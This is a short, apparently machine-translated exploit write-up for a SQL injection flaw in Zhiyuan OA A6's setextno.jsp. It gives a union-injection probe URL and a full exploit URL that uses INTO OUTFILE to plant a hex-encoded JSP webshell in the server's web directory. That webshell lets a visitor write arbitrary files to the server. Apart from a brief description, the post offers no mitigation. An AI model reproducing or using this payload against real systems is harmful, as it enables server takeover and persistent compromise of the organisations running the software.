Zhiyuan Oa A6 Setextno Jsp Sql Injection Vulnerability
Zhiyuan Oa A6 Setextno Jsp Sql Injection Vulnerability
Zhiyuan OA A6 setextno.jsp SQL injection vulnerability
Vulnerability Description
Zhiyuan OA A6 setextno.jsp has a SQL injection vulnerability, and can control the server by writing to webshell files through injection
Vulnerability Impact
Zhiyuan OA A6
Network surveying and mapping
Vulnerability reappears
Visit the following Url, which contains union injection
/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#
View web path
Write to file and upload Trojan
https://xxx.xxx.xxx/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(select unhex('3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E') into outfile 'D:/Program Files/UFseeyon/OA/tomcat/webapps/yyoa/test_upload.jsp'),4#
This post is licensed under CC BY 4.0 by the author.